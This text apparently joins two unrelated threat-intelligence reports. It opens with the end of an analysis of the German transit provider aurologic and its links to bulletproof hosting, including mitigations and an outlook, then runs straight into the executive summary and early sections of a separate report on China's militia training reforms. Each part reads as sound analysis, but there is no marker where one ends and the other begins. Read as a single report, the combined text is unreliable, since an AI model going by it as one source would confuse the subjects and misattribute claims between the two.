On April 7, 2025, Spamhaus again cited aurologic, describing it as an ISP with a “considerable history of bulletproof hosting proliferation” in relation to its provision of connectivity 49.3 Networking LLC (AS399979). Hofmann publicly disputed the characterization, asserting that the company “has no considerable history of bulletproof hosting” and that employees “react according to applicable law” when receiving abuse reports (see Figure 27). In the same thread, Hofmann engaged in a broader discussion with security researcher “Gi7w0rm” regarding aurologic’s continued service to Aeza despite its founders’ arrests and sustained malicious activity. Hoffman outlined his broader stance on maintaining neutrality toward the activity occurring across aurologic’s network, describing neutrality as “the art of being impartial.” This position suggests a broader posture of deliberate non-interference in the name of neutrality, which in practice could explain the persistence of high-risk and abusive networks under aurologic’s infrastructure.

Figure 27: Joseph Hofmann’s public responses to Spamhaus’ post regarding 49.3 Networking LLC (Source: X, formerly known as Twitter)

From the perspective of impacted victims or network defenders, the difference between negligence and complicity is often meaningless if threat actors are enabled to operate freely. When transit providers like aurologic fail to regularly investigate recurring abuse, whether out of resource constraints, business tolerance, or the legal limitations placed on them, the effect is the same: malicious infrastructure remains globally accessible. Under current EU and German law, transit providers are not generally required to proactively monitor or police customer activity unless they possess actual knowledge of illegal use.

aurologic has alluded to strict German data-protection obligations as one of many reasons for avoiding actions such as direct traffic inspection. While that is a legitimate concern, overreliance on that stance can mask operational complacency. The posture is also reflected in the company’s own Terms of Service, which explicitly invoke the EU’s Digital Services Act (DSA) to disclaim liability for content “stored, processed, or transmitted on customer-leased infrastructure,” provided the company is unaware of its existence or does not “actively support illicit use.” Abuse reports are to be verified, forwarded to the customer, and, if unresolved within 24 hours, may result in null-routing of the affected IP address. Only in “rare cases posing higher risks” does aurologic reserve the right to take proactive measures.

The company’s public abuse-handling and authority-request policies follow a similar reactive model. All complaints must be submitted via a designated email channel (abuse@aurologic[.]com) and include a full evidentiary record. Invalid or incomplete submissions are dismissed automatically. These procedures illustrate how aurologic's operational structure aligns with the reactive, notice-based compliance regime established by the Digitale-Dienste-Gesetz (DDG) and DSA. The company’s obligations begin only once it receives valid notice of abuse, and its enforcement options are further bound by procedural and jurisdictional limits. This framework not only defines but effectively constrains how far a provider can intervene, creating an environment where inaction remains legally defensible even amid persistent abuse. In this sense, aurologic’s abuse handling can be seen as a product of the broader European intermediary-liability model, which tends to prioritize legal defensibility over proactive security stewardship.

In practice, this means a provider like aurologic remains compliant with national law even when its network is repeatedly leveraged by threat actors, so long as it can claim lack of awareness of intent. The legal framework effectively absolves transit and hosting providers from responsibility for downstream misuse of their services, allowing malicious infrastructure to persist as long as it operates within the boundaries of plausible deniability.

The uncertainty over whether upstream providers are merely negligent or knowingly complicit underscores a central challenge in combating infrastructure abuse. Larger transit providers often defend their practices by citing contractual compliance and legal obligations, yet this narrow framing leaves ample room for high-risk networks to operate undeterred. For the cybersecurity community, regulators, and policymakers, the question is not only whether negligence or permissiveness is at play, but also how to impose accountability when routing decisions repeatedly sustain threat actors engaged in disinformation, cybercrime, and malware distribution.

Mitigations

• Use Recorded Future Threat Intelligence: Recorded Future customers can proactively mitigate threats originating from malicious networks, such as those discussed in this report, by operationalizing Recorded Future Intelligence Cloud data. This can be achieved by leveraging continuously updated Risk Lists and by blocklisting validated malicious IP addresses to prevent internal communication with malicious infrastructure.
• Implement Robust Network Security Controls: Configure perimeter security appliances and internal network defenses to block traffic originating from the ASNs identified in this report, unless there is a clearly defined business justification for permitting such traffic.

Outlook

Insikt Group assesses with high confidence that aurologic is likely to remain a central hub for TAE networks. Despite growing public pressure and international sanctions against its downstream customers, aurologic continues to operate within the bounds of its legal obligations, providing upstream connectivity that is ultimately enabling the highest concentrations of malicious activity observed within Recorded Future Network Intelligence. This, combined with the absence of coordinated regulatory enforcement, suggests that the conditions enabling high-risk networks to persist under its infrastructure are unlikely to change.

While the exact reason for aurologic’s continued prominence among these networks cannot be confirmed, the company’s public defense of, and ongoing provision of services to, Aeza despite multiple international sanctions, coupled with its publicly stated position of neutrality toward activity on its network, has likely reinforced its reputation among TAEs as a dependable upstream provider.

This case also reflects the greater question at hand within the hosting ecosystem: At what point does neutrality or persistent inaction in the face of systemic abuse become indistinguishable from complicity? As long as transit providers are able to maintain legal compliance while continuing to service networks repeatedly associated with malicious activity, the responsibility for intervention remains displaced onto their customers, even when those customers are the source of the abuse. Until these gaps in compliance, accountability, and proactive oversight are addressed, TAEs will continue to thrive.

Executive Summary

Nearly eight years into reform efforts, the ability of China’s militia forces to support the People’s Liberation Army (PLA) across all domains is likely improving. Progress is slow and almost certainly uneven across geographies and force types, but the Central Military Commission (CMC) National Defense Mobilization Department (NDMD) likely assesses that the quality of militia training is rising. Since approximately 2018, the CMC NDMD has overseen systematic efforts to address challenges across many aspects of militia training — facilities, equipment, participation, realism, jointness, instruction, evaluation, and organization. The focus of militia construction during this period has been to effect a “transformation” from “getting real” (实起来) to “getting strong” (强起来), wherein sub-national authorities responsible for building militia forces were likely instructed to resolve structural and organizational obstacles and increasingly focus on training effective modern forces.

At the CMC NDMD’s direction, authorities have reoriented militia forces to focus on wartime requirements over emergency response functions and issued regulations to strengthen the commitment of militia personnel. They are working to normalize joint training between militias and the PLA and other military and non-military forces, and are likely increasing their focus on training militias to act as cohesive units. At least for authorities with adequate resources, they are investing in militia training bases, adopting simulation technologies, and using data to enhance performance evaluations. Authorities have very likely also restructured militia training to better develop foundational military, specialized, and mission operations skills. Many of these efforts are not new, but expectations for implementation, institutionalization, and outcomes are likely increasing.

Early militia downsizing efforts are likely complete, and pockets of excellence within militia forces are likely emerging. While conventional assessments stress that China’s militias are under-resourced, poorly trained, and ineffective for military (rather than emergency response) operations, the reform efforts begun in 2018 have likely placed these forces on a trajectory that could eventually render such assessments outdated. However, continuing references in Chinese military media and local government documents to the “real”-to-”strong” transformation — which was likely intended for completion in 2020 — indicate the slow pace of militia system reform and lingering organizational problems, and many long-standing challenges to militia development (such as local budget constraints) almost certainly remain relevant for gauging this trajectory.

In response to China’s increasing focus on militia work, governments, militaries, and national security-focused analysts should begin monitoring (or intensify monitoring of) militia construction as part of efforts to understand China’s total armed forces and national defense mobilization capability. Increasing focus on militia development also likely serves as an indicator for assessing China’s intentions with regard to Taiwan, as these forces would very likely be mobilized to support the war effort within China, in the Taiwan Strait, and in cyberspace. These forces are very likely also relevant to China’s preparations for other contingencies, such as conflict in the South China Sea. Key questions to watch going forward include whether authorities introduce a new stage of development under the 15th Five-Year Plan (FYP; 2026-2030), whether training time increases, and how frequently and sophisticatedly militia joint training with the PLA occurs (especially at the campaign level).

Key Findings

• Current militia training guidelines likely seek to promote realism, rigor, and training enhancements delivered by technology and certain methodological approaches, such as virtual reality (VR) for immersive drills, “no script” training to enhance independent decision-making, and cross-jurisdiction activities to raise the quality of militia instructors.
• Authorities are innovating methods for organizing militia training, with goals that likely include improving the development of niche skills and “special forces” like cyber militias and increasing year-round readiness levels; however, despite the focus on readiness, it is likely that not all militia forces undergo training each year.
• Authorities are likely making top-down changes to the militia system to improve coordination and jointness between militia forces and the PLA, integrating militia training with the joint operations training system, and establishing an integrated joint evaluation mechanism, likely leading to more regular joint training and use of PLA resources for militia training.
• Particularly since December 2023, successive provincial-level authorities have implemented policies to increase public enthusiasm for militia construction and improve the willingness of militia personnel to participate in training, directly addressing concerns that have historically impaired the quality of China’s militia forces.
• The CMC NDMD is guiding these and other activities — including reforming financial support for militias and merging militia equipment management with the whole-military weapons equipment system — to drive forward militia construction in support of China’s integrated national strategic system and capability, demanding real effort and results

Methodology

China’s militia forces are highly decentralized. Military authorities across dozens of provincial military districts (省军区; PMD) and garrisons at the same level, hundreds of subordinate military sub-districts (军分区; MSD), and thousands of county-level and grassroots-level people’s armed forces departments (人民武装部; PAFD) are tasked with militia development, supported (particularly funded¹) by civilian authorities at the same level.^{2 3} Further, militia forces are categorized into emergency response forces (应急力量), specialized forces (专业力量), and special forces (特殊力量), and organized to fulfill hundreds of roles depending on the anticipated emergency response and wartime requirements of their local area or command.^{4 5} The types of militias organized — and the training required — vary across provinces, cities, counties, and communities. Many available public sources focus on developments and strategies in specific locations, challenging assessments of developments relevant throughout the entire militia system.

Despite this geographic and functional fragmentation, the militia system is ultimately hierarchical. The CMC NDMD Militia Reserve Bureau (中央军事委员会国防动员部民兵预备役局), in particular, works through the PMD system (which consists of the military commands outlined above) to set relevant policies, standards, procedures, and requirements.⁶ Two critical documents in this effort include the “Militia Construction 14th Five-Year Plan” (民兵建设“十四五”规划; MC 14th FYP) (2021-2025) and the “Militia Military Training Outline” (民兵军事训练大纲; MMTO). Although interpretation and implementation at the local level will vary, these documents orient nationwide militia development toward shared goals in a way that almost certainly creates a baseline for assessing trends throughout the system.

This report uses Chinese military media, local government documents, and other publicly discoverable sources to identify the likely contents of the MC 14th FYP and likely objectives of the MMTO in relation to militia training. The core of the analysis is a review of China Militia⁷ articles published between January 2023 and July 2025 that directly reference the CMC NDMD and its activities, which enabled assessment of this military authority’s priorities and activities in recent years. References within these China Militia articles to particular goals, concepts, and training approaches informed subsequent searches of Chinese sources available through the Recorded Future Intelligence Operations Platform and other open-source avenues, enabling an exploration of trends that are likely relevant to understanding the evolution of militia training throughout China. Additionally, this report draws on a leaked copy of an MMTO that was likely issued in the early 2010s to understand the topics this document covers and assess new developments.

There are several limitations to this approach. While this report strives to highlight trends that are likely relevant throughout the militia system, it is not possible to definitively assert that any single goal, concept, or approach is being implemented across all of China. There is more evidence for some approaches than others, but uneven implementation of national-level expectations is a core challenge to the CMC NDMD’s efforts.⁸ It is similarly difficult to make definitive statements about aspects of militia development that are growing more or less common throughout the system; Chinese academic databases are used to support such analysis when possible. Additionally, no media source used for this research is, despite being credible, necessarily authoritative. The government documents used are authoritative but typically only speak for very specific localities. Nevertheless, the available public sources impart a picture of a militia system under pressure to reform training deficiencies since approximately 2018. Several notable trends and objectives that analysts should consider in future evaluations of China’s militia forces are also found.

Finally, this report focuses on authorities’ efforts to improve militia training. It does not address other essential elements of militia development, such as political education and strategies to organize forces. Some relevant topics, such as militias’ access to necessary equipment, are only discussed briefly.

The Goals and Challenges of Militia Construction

Militia forces are a component of China’s armed forces alongside the PLA and People’s Armed Police (PAP), whose personnel retain their full-time civilian occupations. Militias are under the dual leadership of civilian and military authorities (though Chinese military organizational reforms may be affecting this arrangement), are part of China’s national defense mobilization system (国防动员体系; NDMS), and are “assistants” (助手) to and a reserve force (后备力量) for the PLA. There are two main categories of militias, “primary” and “ordinary.” Primary militias (基干民兵) receive more training, resources, and are the focus of recruitment efforts, while ordinary militias (普通民兵) are a secondary reserve of registered male citizens. Except where stated otherwise, this report focuses on primary militias.

China’s militia forces have multiple responsibilities that include contributing to socialist modernization, maintaining social order, responding to emergencies like natural disasters, and defending the homeland. Historically, in the context of warfighting, the focus of militia construction was mostly on arming forces for conducting conventional and guerilla operations alongside (and as a supplement to) the PLA under the strategies of “luring the enemy in deep” and traditional People’s War. However, at least since the PLA oriented itself toward “winning local wars under informatized conditions” (打赢信息化条件下的局部战争) in 2004 (and likely to some extent before), the “core function” (核心职能) of militia forces and their “main” (主) orientation has been wartime “assistance and support operations tasks” (支援保障作战任务) rather than “directly participating in war.” Over the last decade, authorities have particularly emphasized building “new-type” or “new-quality” militia forces that can support the PLA across all domains — land, sea, air, space, cyberspace, and the electromagnetic spectrum — in the context of modern warfare.

Authorities from the PMD system and relevant PLA theater commands would very likely mobilize militia personnel for a range of responsibilities in wartime, some of which could be dangerous, occur at or near the front line of the conflict, and directly contribute to the success or failure of the PLA’s mission. Potential tasks include but are not limited to conducting or supporting local and rear area defense, cybersecurity for critical infrastructure, stability maintenance (entailing efforts to control unrest and dissent), joint air defense, support PLA logistics, search and rescue, intelligence collection and reconnaissance, enemy harassment, camouflage and deception, minelaying, blockade enforcement, offensive cyber operations, the deployment of special operations forces at sea, and port landing operations.

Historically, China’s militia forces have carried out these roles. Maritime militia forces played a crucial role in China’s capture of the Paracel Islands from Vietnam in 1974. Forces on Woody Island were rapidly mobilized and transported by the PLA Navy to Duncan Island and Palm Island, where they rebuffed Vietnamese navy commandos. Fishing trawlers also provided authorities in China early warning that Vietnam’s navy was moving into the Paracels. During China’s invasion of Vietnam in 1979, support provided by militia forces from Yunnan and Guangxi reportedly included recapturing a riverine island seized by Vietnam, repulsing cross-border attacks from Vietnam, providing artillery support to PLA forces, repairing a road to enable PLA armored forces to outflank the enemy, delivering ammunition and supplies to the front, moving wounded personnel to the rear, and serving as guides to PLA forces along the border.

However, various challenges have long impaired militia force construction and training. This is almost certainly due, in part, to the fact that militia work prioritized the needs of economic development rather than those of national defense from 1985 to approximately 2016 or 2018 (see the Efforts Under the Militia Construction 14th Five-Year Plan section for evidence of the shift back to prioritizing national defense). Some problems relate to the infrastructure that supports training, including finite fiscal resources and limited equipment; outdated and insufficient training facilities; and too few qualified instructors, including for emerging domain subjects. Other problems relate to the content of training itself, such as focus on emergency response at the expense of wartime capabilities and emphasis on the skills of the individual or squad rather than the capabilities of a whole formation or system. Still more problems relate to implementation, including non-uniform standards and lenient evaluations. In particular, authorities are vigilant against lax training that delivers more pageantry than skill development. The willingness of individuals to join militias and of entities (for example, enterprises) to organize militias has been further negatively affected by concerns such as lost wages, injury liability, and lost production time. Fundamentally, authorities worry that many militia personnel lack a strong sense of military identity and commitment to the mission of China’s armed forces.

These and other factors have reportedly led to serious consequences, impairing the ability of these forces to perform the wartime tasks envisioned by authorities. For example, in 2020, an MSD commander in Hebei said of an unmanned aerial vehicle (UAV) militia unit (hereafter, fendui [分队], referring to a group of militia personnel at the battalion, company, platoon, or squad level) that prior to a raft of reforms around training quality, the discrepancy between organization, training, and evaluation and actual combat was large, and that poor understanding of realistic combat drills and unsystematic and non-standard training constrained their fighting capabilities. In cyberspace, militias and other types of reserve forces have struggled to integrate with campaign-level PLA exercises, likely due to a lack of talent. Enterprises in Inner Mongolia have actively organized militia forces but have been reluctant to dispatch them. According to the leadership of one MSD in Liaoning in 2018, anxiety about accidents involving militia personnel increased as militia training requirements became more rigorous. As a result, militia forces were training less or skipping training altogether. Even when training, forces that have to pay expenses out-of-pocket have had little “enthusiasm” for what was asked of them.

Efforts Under the Militia Construction 14th Five-Year Plan

One of the mechanisms that China’s national-level authorities use to shape and direct militia development throughout the country toward a shared goal is the five-year plan (FYP). On October 9, 2021, the State Council and CMC NDMD issued the Militia Construction 14th FYP. This document is not public, but it almost certainly outlines overarching objectives and priorities for building militia forces, like the better-known “14th FYP for National Economic and Social Development” (NESD 14th FYP) does for the economy. As with the NESD 14th FYP, provincial and sub-provincial authorities develop their own MC 14th FYPs according to local conditions and more specific requirements; there is confirmation or indirect evidence of provincial-level MC 14th FYPs for 21 out of 31 provincial-level jurisdictions in China. Based on direct descriptions of the document in Chinese military media, the CMC NDMD’s reported priorities, sub-national regulations issued in recent years, and other information, the MC 14th FYP likely includes the following objectives and priorities:

• Increasing focus on militia development
• Cementing the orientation of militia forces toward wartime requirements
• Progressing development toward a “strong” force after early downsizing efforts
• Optimizing funding and use of financial resources
• Integrating militia equipment management with the PLA’s equipment system
• Strengthening militias’ sense of belonging to the armed forces through nationwide regulation
• Increasing investment in and modernization of militia military training bases

According to a 2025 investigation into militia force development under the MC 14th FYP that the Editorial Department of China Militia organized, this national-level plan is notable because it focused directly on militias. During the 13th FYP period, militia construction was handled under the broader “China Military Reserve Force Construction ‘13th FYP’” (我军后备力量建设“十三五”规划; 2016-2020). The formation of national and sub-national plans dedicated to militia development very likely reflects growing expectation within the CMC NDMD that the PMD system (as well as relevant civilian authorities) resolve the longstanding impediments to an effective militia force. One early 2025 expanded meeting of the CMC NDMD Chinese Communist Party (CCP) Committee demanded that authorities “truly pay attention, truly exert effort, truly implement, and truly achieve results“ (做到真上心, 真用力, 真落地, 真见效) in national defense mobilization work (of which militia force construction is a part). Under the MC 14th FYP, militia construction is being considered a political task in implementing the CMC chairman responsibility system (军委主席负责制) — thereby linking militia reforms to CCP General Secretary Xi Jinping’s personal leadership of China’s armed forces through his role as CMC chairman — and a major task in consolidating an integrated national strategic system and capability (一体化国家战略体系和能力).

The MC 14th FYP has likely cemented the militia’s orientation toward wartime requirements. The aforementioned China Militia investigation highlights that a CMC NDMD “militia construction situation analysis and work promotion conference” (convened on an unspecified date) changed the rhetorical formulation that encapsulates militia functions from “respond to emergencies, respond to war” (应急应战) to “respond to war, respond to emergencies” (应战应急). In this, the primary focus of militia construction has become military-oriented war preparations rather than civilian-oriented emergency response roles, even though militias still shoulder both responsibilities and sources still use the former formulation frequently. It is possible that this change occurred in 2018, in the middle of the 13th FYP; a 2018 PLA Daily article about a “situation analysis” conference used this formulation to describe militia work. It is also possible this change occurred earlier. In 2016, the wider NDMS’s emphasis began shifting back to war mobilization capabilities after years of relative focus on supporting economic development and emergency response. In prioritizing preparations and capabilities for war, militia forces have maintained their pre-existing “main” orientation toward wartime support roles rather than reverting to a “main” orientation of “directly participating in war” (see the section titled The Goals and Challenges of Militia Construction for more details on the history of this point).

Figure 1: Grassroots authorities in Dongguan, Guangdong, hold a militia work meeting in 2022 and promote the “real”-to-”strong” transformation (Source: Sun0796)

The national-level MC 14th FYP likely also conceptualized militia work as deepening a transformational process that began in 2018, moving past earlier force reduction goals and seeking to overcome trickier organizational problems so authorities could increasingly turn to improving the efficacy of militia forces. In 2018, two rhetorical formulations emerged to guide militia work. One describes reforming militia forces “from large to powerful, from capable to elite” (由庞大走向强大、由精干走向精锐; alternatively, 从强大走向精锐). The second describes a transformation from “getting real” to “getting good” and “getting strong” (由“实起来”向“好起来”、“强起来”转变). While the former rhetoric, which refers equally to a downsizing goal and next steps, likely captures the long-term objective, the latter refers to a phased implementation plan. In 2018, the CMC NDMD issued trial measures for militia-related work that likely stipulated forces be “real” by 2018, “good” by 2019, and “strong” by 2020. In this, becoming “real” likely meant overcoming not only impractically large force sizes and structural emphasis on outdated modes of conflict (the focus of early reforms, as discussed below), but also problems like repetitious organization (重复编兵), fake enlistment (虚假编兵), and disparities between organization, training, and real-world use (编训用脱节).

Despite the likely 2020 deadline, Chinese military media, provincial and sub-provincial militia work meetings, and other sources have continued to frame militia work using this “real”-to-”strong” rhetoric throughout the MC 14th FYP period. When asked about how to conduct “high-quality” militia organizational work, unspecified persons affiliated with CMC NDMD-subordinate institutions (机关) told China Militia journalists in a 2025 interview that authorities should seek to achieve this transformation and reiterated the need to resolve the types of organizational challenges named above.

Under the MC 14th FYP, authorities were reportedly tasked with “building muscle” while maintaining the current scale of the militia force (规模不变) by continuing to reform approaches to force organization, optimizing resource allocation, and strengthening combat capabilities. This contrasts with militia construction efforts during the 13th FYP and earlier stages of broader “below-the-neck” (脖子以下) military reforms. These earlier reform periods placed more focus on reducing the number of militia fendui and personnel nationwide, building up “new-type” or “new-quality” fendui within emerging domains like cyber, and crafting a sleeker but more capable and modern force. “China’s National Defense in the New Era” (a government-issued white paper) stated in 2019 that authorities were “streamlining the number of primary militia nationwide, driving deeper reform of militia and reserve forces in their size, structure and composition” to enable “integrated development” of reserve and active-duty forces and accelerating the transformation of militia forces from mainly supporting the ground force to supporting multiple military services.

This “building muscle” task suggests that authorities had largely completed downsizing efforts, began turning their attention to more granular organizational issues, and were supposed to start becoming effective by focusing on training-related challenges. The “real”-to-”strong” rhetoric also suggests this shift by instructing authorities to progress beyond “getting real” to focus on becoming “good” and “strong.” Essentially, the MC 14th FYP likely signaled that the force reduction was complete but that militia work generally remained in a transitory state between addressing harder organizational problems and improving troop efficacy. The “large”-to-”elite” formulation remains relevant to understanding the overall trajectory of militia forces, but emphasis is likely now on the latter objective: moving from “capable to elite.” The structural reforms aimed at modernizing the composition of militia forces by focusing on recruitment from emerging domains may not be complete, but this question requires further research. The aforementioned CMC NDMD-affiliated interviewees reiterate this as an important area of work.

The MC 14th FYP likely seeks to facilitate these militia modernization objectives in a number of ways, including by guiding authorities to modernize militia training facilities and to issue policies that encourage militia participation throughout society. Both of these subjects are discussed in more detail below. Additional efforts include reforming financial support for militia development and militias’ access to needed equipment. In recent years, the CMC NDMD has reportedly sought to optimize the direction and amount of funding provided for militia work. The CMC NDMD has also sought to build a “comprehensive support standards system” (综合保障标准体系) to ensure that financial resources are focused on combat power. The CMC NDMD has also reportedly striven to bring militia equipment support into the “whole-military weapons equipment support system” (全军武器装备保障体系) and introduced a “new model” of equipment warehouse management to MSD authorities. Since the MC 14th FYP was adopted, local authorities have reportedly used a variety of methods (for example, self-procurement and pre-requisitioning) to improve access to equipment and advanced technologies.

Modernizing Militia Training Bases

The MC 14th FYP likely focuses on improving investment in and the quality of militia military training bases (民兵军事训练基地; MMTB). For example, a news report on the Shanxi PMD’s May 2025 inspection of city-level bases referenced requirements set by the national MC 14th FYP and Shanxi’s “Militia Training Base Construction Three-Year Development Plan” that called for such bases to be built or renovated and operational by the end of the year. Hunan, and at least one subordinate jurisdiction, have similarly issued 14th FYPs for MMTB development. A July 2025 news report on the opening of a district-level training base in Xiamen notes this was a “major project” of Fujian’s provincial MC 14th FYP. At the provincial and sub-provincial levels, authorities in Fujian have written militia training base construction into their NESD 14th FYPs. Within this activity, two notable trends in MMTB modernization include adopting new technology like simulation and virtual reality (VR) to strengthen training and establishing specialized bases for specific requirements. For example:

• Zhejiang authorities are pursuing a “one base, one specialty” (一基地一特色) model that mines local enterprises for applicable technologies, such as to establish MMTBs with ship navigation simulation, UAV coordination and confrontation simulation, virtual shooting ranges, and cyber ranges.
• Authorities created Dongguan, Guangdong’s first cyber militia training base in 2019 at the Chinese Academy of Sciences Cloud Computing Center (CAS CCC; 中国科学院云计算中心), to support cyber militia talent development and cyber offense-defense training.
• The Xinjiang Production and Construction Corps Second Division is using VR at its MMTB to simulate immersive realistic confrontation training and cultivate UAV operators, communications support, and other talent.
• Authorities in Guizhou have renovated a county-level MMTB to add a UAV specialized training field that comprises a multi-rotor drone training area, first-person-view (FPV) direct line training area, FPV comprehensive training area, and drone repair center.

Figure 2: Cyber militia fendui and center leadership outside of CAS CCC (Source: CAS CCC)

Another trend is coordinating MMTBs for use as multi-functional, comprehensive spaces that serve military and local government needs. Efforts to refine a three-tiered approach to organizing MMTBs, which were seen as early as 2011, are also continuing. Hunan and Hubei, for instance, both employ this model: provincial bases are the backbone, city bases are the main, and county bases are the supplement. This echoes the hierarchical approach to militia training more broadly (see Appendix A). These efforts are not only aimed at improving training but also optimizing available resources to prevent waste. Specific examples of these reforms include:

• Hebei authorities establishing provincial-level specialized emergency response training bases on the basis of four existing city-level MMTBs; the new MMTBs respectively focus on counter-terrorism and stability maintenance, forest firefighting, earthquake relief, and flood relief.
• Authorities in Shandong converting traditional single-function county-level MMTBs into comprehensive MMTBs that can serve militia, PAP, and public security training requirements.
• Hunan authorities implementing military-local government joint development of a provincial, city, and county multi-level MMTB system in which facilities are established at key locations (for example, where potential aerial threats are a prominent concern and along common PLA cross-region maneuver routes) and designed to focus on that area’s priority requirement while accommodating other needs like national defense education, student military training, civil air defense team training, and the needs of locally garrisoned troops.

Providing Benefits to Spur Participation

Under the MC 14th FYP, the CMC NDMD has guided every PMD to formulate and issue policies that induce recruits, enterprises, and other entities to participate in militia construction and training more enthusiastically. Since 2020, at least fifteen (and possibly as many as 22) provincial-level jurisdictions across China have issued (or are formulating) highly uniform sets of policy measures that seek to strengthen militia development in this manner, with all but one such measure issued in or after December 2023. Sub-provincial authorities have issued similar measures since at least 2018. Several of these regulatory documents specifically mention the national MC 14th FYP or their local MC 14th FYPs as a basis for the measures. The measures provide militia personnel and the entities that organize militia fendui (for example, enterprises, universities, work units, and social organizations) with tangible benefits and greater financial security in exchange for their service in China’s armed forces.

In at least fourteen of China’s 31 provincial-level jurisdictions, provincial-level civilian and military authorities have jointly issued documents called “militia rights and benefits guarantee measures” (民兵权益保障办法), “primary militia preferential treatment and rights and benefits guarantee measures” (基干民兵优待和权益保障办法), and other close variations. As seen in Appendix B, the earliest of these was issued in December 2020 in Inner Mongolia, while the remainder were all issued in or after December 2023. In one of the fourteen jurisdictions (Henan), authorities have issued the measures for public comment but have not yet formally adopted them. Half of these policies are “trial” or “provisional” measures, indicating they will likely be formalized and potentially revised after an assessment of whether they achieve authorities’ goals. In September 2025, authorities in Guangdong deliberated their version of these measures, raising the number of provincial-level jurisdictions that have issued or are formulating the measures to fifteen.¹²⁹

Sub-provincial localities within at least seven additional provincial-level jurisdictions have also issued these measures, raising the possibility that corresponding provincial-level policies also exist. These local-level measures are seen in Anhui (in 2023), Chongqing (“recent years” before 2024), Jilin (2021), Shaanxi (2022), Shandong (2024), Sichuan (2022), and Qinghai (2023 and 2024). The earliest adoption of a similar measures package likely occurred in Panjin, Liaoning, in 2018. Delegates to Chongqing’s 2024 “Two Sessions” legislative event reportedly “hotly discussed” the adoption of such measures at the municipal (provincial) level, but it is unclear whether Chongqing authorities have done so.

Although variation exists, the rationale for these measures is highly uniform across all of the issued policies. The CMC NDMD’s reported goal is to “make militias truly find the feeling of being a ‘soldier’ and enjoy the treatment of a ‘soldier.’” According to Hunan province’s version of the measures, their goal is to stimulate the sense of honor, responsibility, and mission of the masses and various entities that support and participate in militia work. Many also refer to improving the “sense of gain” (获得感) felt by participants in militia work. As seen in discussions during Chongqing’s 2024 “Two Sessions” and media comments by elements of the Gansu PMD, the measures are understood as contributing to the construction of a “militia honors system” (民兵荣誉体系). The benefits are being highlighted in militia recruitment drives as incentives for joining. A 2021 China National Defense News article covering these measures in one Jilin city asserted that “preferential treatment policies are stimulating the passion of the majority of militiamen for training and work"; one member of a local militia reportedly said the forces have been given this much “warmth and caring” and therefore must repay it with “practical action.”

The measures are generally divided into two sets of policies, one catering to militia personnel and one catering to entities that organize militias. The measures most frequently apply to primary militias rather than ordinary militias. However, some jurisdictions offer a relatively limited set of benefits to all militias or extend the benefits of primary militia status to ordinary militias when the latter are on duty executing wartime and emergency response roles. The measures issued in each jurisdiction do not offer the exact same mix of specific policies, but nearly all of the measures in each issued policy fall within the same fifteen benefit categories. Benefits for militia personnel include monetary and non-monetary rewards for exemplary performance, hardship assistance, medical insurance to cover injuries sustained during training or deployment, duty subsidies, and preferential or discounted access to various services like national parks, banking, and transportation. Benefits for entities that organize militias include enrollment in military-civil fusion procurement channels, priority consideration for participation in political fora, and reimbursement or tax deductions for militia-related expenses. See Appendix B for more benefits and details.

Objectives of the Militia Military Training Outline

Another mechanism shaping and directing militia development throughout China toward a shared goal is the Militia Military Training Outline, which is very likely issued by the CMC NDMD and updated every few years. This document identifies the personnel, time, content, and quality requirements for organizing militia training, which focuses on proper politics, military theory, military operations, combat skills, and specialized functional skills. More specific annual militia training plans issued at the provincial and sub-provincial levels work toward the requirements of the MMTO and those set by each superior level in the PMD system, as informed by the needs of PLA theater commands and services. For more detail on the hierarchical militia training system, see Appendix A. Based on direct descriptions of this document in Chinese military media, the CMC NDMD’s reported priorities, activities within the PMD system in recent years, and other information, the current MMTO likely seeks to promote the following objectives:

• Ensuring that wartime requirements inform training content and methods
• Promoting the integration of technology to support training quality
• Achieving a rigorous, realistic combat standard
• Promoting foundational military skills, specialized skills, and mission operations skills
• Normalizing joint training between militia forces and the PLA
• Improving the quality of militia instruction
• Raising standards and methods for evaluating training
• Innovating methods for organizing training and assigning standby status for readiness

Figure 3: Militia personnel train for UAV operations in Heilongjiang (Source: China Militia)

A likely copy of an MMTO from the early 2010s is discoverable online and reveals the general structure of this document. It provides principles to guide militia military training organization and methods; objectives and requirements for training; standards to regulate the time spent in training; clarification on the responsibilities held by each level of the PMD system, military regions (now replaced by theater commands), and PLA services; and standards for evaluating training performance. This copy stipulated that militia training should be led by preparations for military struggle (以军事斗争准备为牵引); focused on key content associated with realistic combat requirements (训用一致; 根据实战需要); conducted using targeted training aimed at specific missions (针对性训练; 针对不同对象，采取不同方法); improved with technology (科技兴训); networked (网络化), simulated (模拟化), and “base-itized” (基地化), referring to the use of MMTBs; and linked (挂钩训练) and joint (联训联演) with active-duty military troops and military academic institutions. However, the copy may be incomplete based on descriptions of even older MMTOs, which likely included details on training content for more than 100 types of fendui.

The current MMTO covers the same range of topics and very likely highlights many of the same themes. According to a July 2023 China National Defense News article, the MMTO is an authoritative document that is the basic regulation determining what should be trained and evaluated, and how authorities should go about this work, including in relation to content, personnel, time, and quality. The article particularly references optimizing methods for organizing training, increasing the use of technology in education and training, scientifically pairing methods and content, and rebuilding the training supervision system. A 2025 National Defense Times article refers to a “new outline,” citing grassroots officials in Henan as asserting that edits therein further the realistic combat orientation. This article also suggests the current outline likely calls for innovating training models.

The CMC NDMD’s publicly reported priorities and activities likely provide further insight as to the current MMTO’s content. In recent years, the CMC NDMD has likely insisted that militia training implements “war-training unity” (战训一致), uses war to lead training (以战领训), and uses training to promote war (capabilities) (以训促战). The CMC NDMD has likely further emphasized technologically strong training (科技强训) and systemic joint training (体系联训) throughout the NDMS. A member of one CMC NDMD review group tasked with evaluating militia training across six PMDs in late 2024 said that militia forces should “specialize in training what the military forces lack.” The aforementioned CMC NDMD-affiliated interviewees told journalists that authorities should focus on optimizing training content that aligns with the missions and tasks assigned to specific types of militia forces, which includes a requirement to “supplement deficiencies and align [capabilities]” (补差、接口的要求). The CMC NDMD is also likely (almost certainly in some cases) focused on realistic training, joint training, effective evaluation, and organizational innovations, as described below. Also explored below is a tripartite training structure that, while not linked to NDMD activities directly, emerges from available sources as a new approach. Across many of these concepts and goals is an emphasis on resource sharing, which is likely also included in the current MMTO.

